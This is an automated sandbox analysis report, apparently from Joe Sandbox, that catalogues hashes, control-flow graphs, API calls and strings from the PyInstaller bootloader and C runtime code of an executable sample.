                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212d86a86c8cb6d9fc903fcdabd382662a83ce4cb1445b9d6573bc2018cf14a4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E52DF72A186A69BE7A49F14CC58E7EBBB9EF44340F814139E64A87780DB38D845CF50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 930 7ff72aa96bcc-7ff72aa96c01 call 7ff72aa962d8 call 7ff72aa962e0 call 7ff72aa96348 937 7ff72aa96d3f-7ff72aa96dad call 7ff72aa8b4a4 call 7ff72aa921c8 930->937 938 7ff72aa96c07-7ff72aa96c12 call 7ff72aa962e8 930->938 950 7ff72aa96daf-7ff72aa96db6 937->950 951 7ff72aa96dbb-7ff72aa96dbe 937->951 938->937 943 7ff72aa96c18-7ff72aa96c23 call 7ff72aa96318 938->943 943->937 949 7ff72aa96c29-7ff72aa96c4c call 7ff72aa8b4ec GetTimeZoneInformation 943->949 962 7ff72aa96c52-7ff72aa96c73 949->962 963 7ff72aa96d14-7ff72aa96d3e call 7ff72aa962d0 call 7ff72aa962c0 call 7ff72aa962c8 949->963 953 7ff72aa96e4b-7ff72aa96e4e 950->953 954 7ff72aa96dc0 951->954 955 7ff72aa96df5-7ff72aa96e08 call 7ff72aa8e19c 951->955 957 7ff72aa96dc3 953->957 958 7ff72aa96e54-7ff72aa96e5c call 7ff72aa96950 953->958 954->957 967 7ff72aa96e13-7ff72aa96e2e call 7ff72aa921c8 955->967 968 7ff72aa96e0a 955->968 964 7ff72aa96dc8-7ff72aa96df4 call 7ff72aa8b4ec call 7ff72aa7be00 957->964 965 7ff72aa96dc3 call 7ff72aa96bcc 957->965 958->964 969 7ff72aa96c75-7ff72aa96c7b 962->969 970 7ff72aa96c7e-7ff72aa96c85 962->970 965->964 986 7ff72aa96e30-7ff72aa96e33 967->986 987 7ff72aa96e35-7ff72aa96e47 call 7ff72aa8b4ec 967->987 973 7ff72aa96e0c-7ff72aa96e11 call 7ff72aa8b4ec 968->973 969->970 975 7ff72aa96c87-7ff72aa96c8f 970->975 976 7ff72aa96c99 970->976 973->954 975->976 981 7ff72aa96c91-7ff72aa96c97 975->981 982 7ff72aa96c9b-7ff72aa96d0f call 7ff72aa9b380 * 4 call 7ff72aa937ac call 7ff72aa96e64 * 2 976->982 981->982 982->963 986->973 987->953
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96BFA
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA96348: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72AA9635C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96C0B
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA962E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72AA962FC
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF72AA96C1C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA96318: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72AA9632C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B502
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4EC: GetLastError.KERNEL32(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B50C
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72AA96E5C), ref: 00007FF72AA96C43
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorInformationLanguagesLastPreferredRestoreThreadTimeZone
                                                                                                                                                                                                                                                            • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                                                                                                            • API String ID: 2248164782-690618308
                                                                                                                                                                                                                                                            • Opcode ID: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                                                                                                                                                                                                                            • Instruction ID: 0dd9c92551c095f11b2f9985c7053537e36548267466216d585dcea26ef6b15d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e110c42c992c942a967616de5e9b20753deb8e2725d4993c570f78644da606e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D515D22A0868386F710FF25DC81DA9E770FF58784F804576EA4D87A96DF3CE5468B60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                            • API String ID: 0-1127688429
                                                                                                                                                                                                                                                            • Opcode ID: 326cf6427d5bf0e9376a5910f25170e202e1497fb5a723acb88e47d2bece8f14
                                                                                                                                                                                                                                                            • Instruction ID: 30daac6967b1fdfca2a5754f36d9b05e98136cca07474488e831bfd197370820
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 326cf6427d5bf0e9376a5910f25170e202e1497fb5a723acb88e47d2bece8f14
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F18F72A183D59AF7A5AB148C88E3FBBB9FF44740F454579EA4A07290CB38D942CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2295610775-0
                                                                                                                                                                                                                                                            • Opcode ID: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                                                                                                                                                                                                                            • Instruction ID: 83e76cf6b40b84f903c826329d0766596a4c64a4a4fa5ed93a1d9b78f0c669a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4e9d4f2f4e135cd5a826bc565e92bc8980f88c43f5a21f71a862fe531212b02
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF08162A1868286F7A09F64EC49B6EB3A0EF84724F800235D66D026D4DF3CE44A8E10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                            • API String ID: 0-900081337
                                                                                                                                                                                                                                                            • Opcode ID: eff0553be1f10ec537251e961509bf2a8d4d677e3d27bfe4c15f043eb5d22666
                                                                                                                                                                                                                                                            • Instruction ID: 1554e1761894a9ce8485ca29bade8befd31111e19b4864581cdaf5e2e40c3630
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eff0553be1f10ec537251e961509bf2a8d4d677e3d27bfe4c15f043eb5d22666
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81919372A192C58BF7A5AA14CC48E3F7ABDFF44340F514179DB4A46690CB38E942CF50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 0 7ff72aa71700-7ff72aa71714 1 7ff72aa7172e-7ff72aa71732 0->1 2 7ff72aa71716-7ff72aa7172d call 7ff72aa72b10 0->2 4 7ff72aa71758-7ff72aa7177b call 7ff72aa77c10 1->4 5 7ff72aa71734-7ff72aa7173d call 7ff72aa712a0 1->5 11 7ff72aa7177d-7ff72aa717a8 call 7ff72aa72870 4->11 12 7ff72aa717a9-7ff72aa717c4 call 7ff72aa73fc0 4->12 13 7ff72aa7174f-7ff72aa71757 5->13 14 7ff72aa7173f-7ff72aa7174a call 7ff72aa72b10 5->14 20 7ff72aa717de-7ff72aa717f1 call 7ff72aa80df4 12->20 21 7ff72aa717c6-7ff72aa717d9 call 7ff72aa72b10 12->21 14->13 27 7ff72aa71813-7ff72aa71817 20->27 28 7ff72aa717f3-7ff72aa7180e call 7ff72aa72870 20->28 26 7ff72aa7191f-7ff72aa71922 call 7ff72aa8076c 21->26 33 7ff72aa71927-7ff72aa7193e 26->33 30 7ff72aa71819-7ff72aa71825 call 7ff72aa71050 27->30 31 7ff72aa71831-7ff72aa71851 call 7ff72aa85570 27->31 37 7ff72aa71917-7ff72aa7191a call 7ff72aa8076c 28->37 38 7ff72aa7182a-7ff72aa7182c 30->38 40 7ff72aa71853-7ff72aa7186d call 7ff72aa72870 31->40 41 7ff72aa71872-7ff72aa71878 31->41 37->26 38->37 49 7ff72aa7190d-7ff72aa71912 40->49 44 7ff72aa7187e-7ff72aa71887 41->44 45 7ff72aa71905-7ff72aa71908 call 7ff72aa8555c 41->45 48 7ff72aa71890-7ff72aa718b2 call 7ff72aa80abc 44->48 45->49 52 7ff72aa718e5-7ff72aa718ec 48->52 53 7ff72aa718b4-7ff72aa718cc call 7ff72aa811fc 48->53 49->37 55 7ff72aa718f3-7ff72aa718fb call 7ff72aa72870 52->55 58 7ff72aa718ce-7ff72aa718d1 53->58 59 7ff72aa718d5-7ff72aa718e3 53->59 62 7ff72aa71900 55->62 58->48 61 7ff72aa718d3 58->61 59->55 61->62 62->45
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3833288071
                                                                                                                                                                                                                                                            • Opcode ID: f155ba7c1e409e8dd92aaebb21cf30c3edeb765cbc1e50d792bdd50ce01b36d6
                                                                                                                                                                                                                                                            • Instruction ID: ad9d83e9dc60814de552003260b83e5a76f86bb1b91e102b21db4cf7c11dd4b7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f155ba7c1e409e8dd92aaebb21cf30c3edeb765cbc1e50d792bdd50ce01b36d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69516E61B08A4386FB10BB15DC50E7EE3B1EF44794FC445B1DE4D076A9DE2DE64A8B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                            • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 677216364-1384898525
                                                                                                                                                                                                                                                            • Opcode ID: d767be5d7a092a22f165d7fbc5367fda776b66ec7992fa0eab7fb37216aecb80
                                                                                                                                                                                                                                                            • Instruction ID: 9c31f1f505ff34c15e09b33b8876fc69913fae8376617a916e168f720c80b9a4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d767be5d7a092a22f165d7fbc5367fda776b66ec7992fa0eab7fb37216aecb80
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C517B72A08A0286FB14EF24DC5097DB3B0EF48B84FD18176DA0C477A9DE2CE546CB64
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 266 7ff72aa71000-7ff72aa739b6 call 7ff72aa80540 call 7ff72aa80538 call 7ff72aa787a0 call 7ff72aa80538 call 7ff72aa7bda0 call 7ff72aa858d0 call 7ff72aa864d8 call 7ff72aa71ea0 284 7ff72aa739bc-7ff72aa739cc call 7ff72aa73eb0 266->284 285 7ff72aa73b5f 266->285 284->285 290 7ff72aa739d2-7ff72aa739e5 call 7ff72aa73d80 284->290 287 7ff72aa73b64-7ff72aa73b84 call 7ff72aa7be00 285->287 290->285 294 7ff72aa739eb-7ff72aa73a12 call 7ff72aa77b60 290->294 297 7ff72aa73a54-7ff72aa73a7c call 7ff72aa78040 call 7ff72aa71ca0 294->297 298 7ff72aa73a14-7ff72aa73a23 call 7ff72aa77b60 294->298 308 7ff72aa73b2d-7ff72aa73b3e 297->308 309 7ff72aa73a82-7ff72aa73a98 call 7ff72aa71ca0 297->309 298->297 304 7ff72aa73a25-7ff72aa73a2b 298->304 306 7ff72aa73a2d-7ff72aa73a35 304->306 307 7ff72aa73a37-7ff72aa73a51 call 7ff72aa8555c call 7ff72aa78040 304->307 306->307 307->297 313 7ff72aa73b92-7ff72aa73b95 308->313 314 7ff72aa73b40-7ff72aa73b47 308->314 321 7ff72aa73a9a-7ff72aa73ab2 call 7ff72aa72b10 309->321 322 7ff72aa73ab7-7ff72aa73aba 309->322 317 7ff72aa73bab-7ff72aa73bc3 call 7ff72aa78bd0 313->317 318 7ff72aa73b97-7ff72aa73b9d 313->318 314->313 319 7ff72aa73b49-7ff72aa73b51 call 7ff72aa78970 314->319 333 7ff72aa73bce-7ff72aa73bd5 SetDllDirectoryW 317->333 334 7ff72aa73bc5-7ff72aa73bcc 317->334 323 7ff72aa73bdb-7ff72aa73be8 call 7ff72aa76de0 318->323 324 7ff72aa73b9f-7ff72aa73ba9 318->324 335 7ff72aa73b85-7ff72aa73b88 call 7ff72aa714e0 319->335 336 7ff72aa73b53 319->336 321->285 322->308 331 7ff72aa73abc-7ff72aa73ad3 call 7ff72aa73fc0 322->331 341 7ff72aa73bea-7ff72aa73bf7 call 7ff72aa76a90 323->341 342 7ff72aa73c33-7ff72aa73c38 call 7ff72aa76d60 323->342 324->317 324->323 344 7ff72aa73ada-7ff72aa73b06 call 7ff72aa782b0 331->344 345 7ff72aa73ad5-7ff72aa73ad8 331->345 333->323 340 7ff72aa73b5a call 7ff72aa72b10 334->340 349 7ff72aa73b8d-7ff72aa73b90 335->349 336->340 340->285 341->342 357 7ff72aa73bf9-7ff72aa73c08 call 7ff72aa765f0 341->357 352 7ff72aa73c3d-7ff72aa73c40 342->352 344->308 359 7ff72aa73b08-7ff72aa73b10 call 7ff72aa8076c 344->359 350 7ff72aa73b15-7ff72aa73b2b call 7ff72aa72b10 345->350 349->285 349->313 350->285 355 7ff72aa73ce6-7ff72aa73cf5 call 7ff72aa734a0 352->355 356 7ff72aa73c46-7ff72aa73c50 352->356 355->285 374 7ff72aa73cfb-7ff72aa73d54 call 7ff72aa78940 call 7ff72aa77fd0 call 7ff72aa77b60 call 7ff72aa73600 call 7ff72aa78080 call 7ff72aa76840 call 7ff72aa76d60 355->374 360 7ff72aa73c53-7ff72aa73c5d 356->360 372 7ff72aa73c29-7ff72aa73c2e call 7ff72aa76840 357->372 373 7ff72aa73c0a-7ff72aa73c16 call 7ff72aa76570 357->373 359->350 365 7ff72aa73c66-7ff72aa73c68 360->365 366 7ff72aa73c5f-7ff72aa73c64 360->366 370 7ff72aa73c6a-7ff72aa73c8d call 7ff72aa71ee0 365->370 371 7ff72aa73cb1-7ff72aa73ce1 call 7ff72aa73600 call 7ff72aa73440 call 7ff72aa735f0 call 7ff72aa76840 call 7ff72aa76d60 365->371 366->360 366->365 370->285 386 7ff72aa73c93-7ff72aa73c9d 370->386 371->287 372->342 373->372 387 7ff72aa73c18-7ff72aa73c27 call 7ff72aa76c30 373->387 409 7ff72aa73d56-7ff72aa73d5d call 7ff72aa77d40 374->409 410 7ff72aa73d62-7ff72aa73d65 call 7ff72aa71e70 374->410 391 7ff72aa73ca0-7ff72aa73caf 386->391 387->352 391->371 391->391 409->410 413 7ff72aa73d6a-7ff72aa73d6c 410->413 413->287
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA73EB0: GetModuleFileNameW.KERNEL32(?,00007FF72AA739CA), ref: 00007FF72AA73EE1
                                                                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF72AA73BD5
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA77B60: GetEnvironmentVariableW.KERNEL32(00007FF72AA739FF), ref: 00007FF72AA77B9A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA77B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72AA77BB7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                                                            • API String ID: 2344891160-1544818733
                                                                                                                                                                                                                                                            • Opcode ID: 767da2809997ecd08a899f0714dab35352101c7708ff18cc608221b79fe6a14f
                                                                                                                                                                                                                                                            • Instruction ID: fc267921f97c977c1396ab03f043022fb0e0b7b912cce3fa51b8b593efea149b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 767da2809997ecd08a899f0714dab35352101c7708ff18cc608221b79fe6a14f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AEB16021A19A4381FB65BB219D51ABFE2B0EF84784FC041F5EA4D47696DF2CE5078B30
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                                                            • Opcode ID: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                                                                                                                                                                                                                            • Instruction ID: 4b6c23b0a7b589e3e9eb9bf236eb15ff96eb6e99e945345955b35556006a30f1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3741643826c5352320942fbf43c5de1d0e179915c125a0ccfc2097356f541c1c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B414132A08B8285EB20AB24EC456AAE3B0FF94364F900776E6AD437D5DF7CD5458F50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
